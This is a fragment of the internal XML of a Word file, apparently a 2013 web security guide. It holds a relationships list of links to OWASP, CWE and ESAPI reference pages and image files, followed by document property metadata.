Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.infosecurity-magazine.com/view/30282/remote-code-vulnerability-in-spring-framework-for-java/" TargetMode="External"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.jpeg"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.jpeg"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.jpeg"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.jpeg"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.jpeg"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.jpeg"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.jpeg"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.jpeg"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.jpeg"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html" TargetMode="External"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pcmag.com/article2/0,2817,11525,00.asp" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pcmag.com/article2/0,2817,11525,00.asp" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pcmag.com/article2/0,2817,11525,00.asp" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pcmag.com/article2/0,2817,11525,00.asp" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pcmag.com/article2/0,2817,11525,00.asp" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pcmag.com/article2/0,2817,11525,00.asp" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pcmag.com/article2/0,2817,11525,00.asp" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/AntiSamy" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/AntiSamy" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/AntiSamy" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/AntiSamy" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Data_Validation" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Data_Validation" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://benchmarks.cisecurity.org/downloads/benchmarks/" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://benchmarks.cisecurity.org/downloads/benchmarks/" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://benchmarks.cisecurity.org/downloads/benchmarks/" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://benchmarks.cisecurity.org/downloads/benchmarks/" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.jpeg"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpeg"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Data_Validation" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Data_Validation" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Data_Vali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EE794-BB2D-8046-948F-F27B506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16873</Words>
  <Characters>96182</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>801</Lines>
  <Paragraphs>225</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>11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ntao wang</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-06-23T01:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-06-24T11:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>